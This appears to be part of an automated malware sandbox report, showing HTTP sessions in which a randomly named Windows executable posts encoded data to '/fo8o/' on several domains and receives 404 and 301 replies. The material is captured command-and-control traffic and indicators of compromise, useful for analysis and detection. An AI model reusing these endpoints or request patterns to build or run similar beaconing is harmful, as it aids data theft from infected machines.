                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.450022195.110.124.133805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:16.819015980 CET10899OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 50 6f 6d 4c 43 66 2f 74 36 30 52 55 6f 71 73 39 59 75 51 4b 61 34 6f 35 70 72 44 76 4d 48 39 53 62 53 68 6a 65 48 2b 32 33 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 47 4c 61 4b 4e 65 70 57 45 41 32 2b 42 2b 44 43 52 31 73 43 35 72 75 62 64 54 48 39 48 45 6d 53 68 4b 67 37 75 52 70 75 59 43 72 6e 69 79 5a 4f 78 78 2b 66 77 38 68 64 6d 30 68 56 58 6f 4e 6d 78 71 49 59 47 2f 69 31 5a 34 2b 48 2f 6a 75 4d 46 [TRUNCATED]
                                                                            Data Ascii: Ml18S=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWPomLCf/t60RUoqs9YuQKa4o5prDvMH9SbShjeH+23Z5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqGLaKNepWEA2+B+DCR1sC5rubdTH9HEmShKg7uRpuYCrniyZOxx+fw8hdm0hVXoNmxqIYG/i1Z4+H/juMFpdnN89VHxi9Jaw2sh9CJtt+C8Sr1Z+wRy6TYReB5ys/dgCKdsxeFltjZCAFlR5VrM/1wLjkKF7adGqPCLL0d6uoU+eDO0hvKYenTQgmZYHEe7+UHsu7TbsYxpgNn4i4AD48jePo5nIOTt5WZ8qQEK9l6v8jw+L3ZPIkNmIKTn8l0QHC66zVtxqxlwhPsJONRF5FAwRxuYLLuQ1AOQBB41G1JstARWEryL4EWLo8zBHXMNllACaAZFn5DU9b+ORBkDKjbAun2+jQdpx3k59oRagJTgQRC42PnmyV724DU3eHzPcw3jHkhDTBMUu50+QeZwRo8k7ZmO+LkzJBi9hX2cfvkbkEZd4sgtXZmtGbW7zV0o2kw2jakmpjgYjUGXpPQpEVV2MLERunr2S6kdI28PkpXxDFDpxI2ot5wnZD1uv/gRMCUeLXN8foAD2fi2+6XdpFXTlAb08OkXYVy3T2zFUJqP/ic/54OhEflwYIgGCNHa0xouhuieOTsEX53hl7k6RUj+gkXp5Cu3+MpVQV3aqO1ZUp9WF1xfNy1ZqrPB2m6U9YSJR1cNzgRyM7Vo3xo3OeObcpYXhPl0lUg0qc5YNT73BhEKXxkc/wP7N6sojl/DTcsdpZgnfc1gQI2iGwx8sfZCGdjOVKcvA0Br8ZGbFgYA1ebCJMSFM [TRUNCATED]
                                                                            Nov 22, 2024 07:52:18.324264050 CET367INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:17 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.450023195.110.124.133805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:19.474291086 CET521OUTGET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.elettrosistemista.zip
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:52:20.826541901 CET367INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:20 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.450024217.196.55.202805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:43.390568018 CET785OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 76 4e 72 6a 75 6d 30 30 49 4c 61 47 32 41 39 45 68 75 48 58 68 74 4e 38 33 6a 33 52 2b 57 52 6b 41 3d 3d
                                                                            Data Ascii: Ml18S=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuvNrjum00ILaG2A9EhuHXhtN83j3R+WRkA==
                                                                            Nov 22, 2024 07:52:44.586931944 CET1085INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Fri, 22 Nov 2024 06:52:44 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.450025217.196.55.202805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:46.041043043 CET805OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4a 2b 68 77 71 44 63 39 72 59 2f 4a 32 6a 6d 44 58 34 6d 45 37 4c 4e 4e 4a 54 4a 57 65 6b 6a 6b 6f 3d
                                                                            Data Ascii: Ml18S=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJ+hwqDc9rY/J2jmDX4mE7LNNJTJWekjko=
                                                                            Nov 22, 2024 07:52:47.290750980 CET1085INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Fri, 22 Nov 2024 06:52:47 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.450026217.196.55.202805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:48.697500944 CET10887OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 78 48 57 62 6e 4e 6e 39 58 44 6b 63 50 7a 63 2f 49 66 5a 6e 42 33 59 7a 51 6e 57 4b 66 49 72 65 6b 75 34 32 30 73 63 6f 4b 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 5a 52 39 30 30 4c 6f 68 32 6c 42 77 34 6d 37 61 5a 69 6a 72 67 32 72 76 49 72 5a 7a 56 34 75 5a 39 32 42 53 54 4b 34 66 6a 2f 42 38 4e 6d 64 70 76 4c 64 4f 51 6b 65 66 4c 34 52 42 45 32 54 6a 57 6c 79 4a 38 76 47 6d 71 67 48 44 62 38 46 50 65 [TRUNCATED]
                                                                            Data Ascii: Ml18S=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJxHWbnNn9XDkcPzc/IfZnB3YzQnWKfIreku420scoKATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHZR900Loh2lBw4m7aZijrg2rvIrZzV4uZ92BSTK4fj/B8NmdpvLdOQkefL4RBE2TjWlyJ8vGmqgHDb8FPeVK7i3wjnW4Pkze5PVOi1QX827zWpkmljH0ttuiIp3QemGg1xQL6nC37nf6XPI4KATMgnVAKME42Z8DL8OybVLpktW6GlxYlU5aI0OpSMJSB4iJRacAN12s2+zc2ARHpFe90cC5U7+mKvZl2yMu8smqwJpNXkSTLUB8JW36BpgzKjTATzL/D1RlQZmMo7+IT5MAsmfDWkWGxGnylL78IzMeSiC9hMlVnpVRDCU5SM4jzvqdIO1s1t1askykCWpwY9wYfHRRA9iTk9HKitsqtVy41gY9YkVKq1RwBhDLTNWY/dQ6g5k4ErKWnmMSZOfYNmHe6uYO+jKxiATAaAERvIpDJfEcBj7wUSFIFuZQAfApvKYpYVtd1CAQte3+V12D6numDy1w2VPWnIKF3xJWfie2IqH0c0iusz09pLReNQv4O0ppV+kALBooou/oMbCnF0CR/pNgJuLc7H7RpmmEFD3/buWJ/BosMnnN3kbzP/LY8gGepMRZk8f5aQCTg/NlPQpwRSIrex4Xbe9T720PRkZoHfkkdtqOpqVW73vhJj4v5PcVmldOF6+gluDjnrRriUwvRUVEXfR2b3hUI5RnHvFqyYrbfV2d6LBYOUsw13oMdbhY7gTrPN6ruraLewSydN24N73HoTY6DF9B0vmGZGuVzmxcwh2ZI9Kr [TRUNCATED]
                                                                            Nov 22, 2024 07:52:49.939519882 CET1085INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Fri, 22 Nov 2024 06:52:49 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.450027217.196.55.202805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:51.349225998 CET517OUTGET /fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.empowermedeco.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:52:52.599158049 CET1234INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Fri, 22 Nov 2024 06:52:52 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmp
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
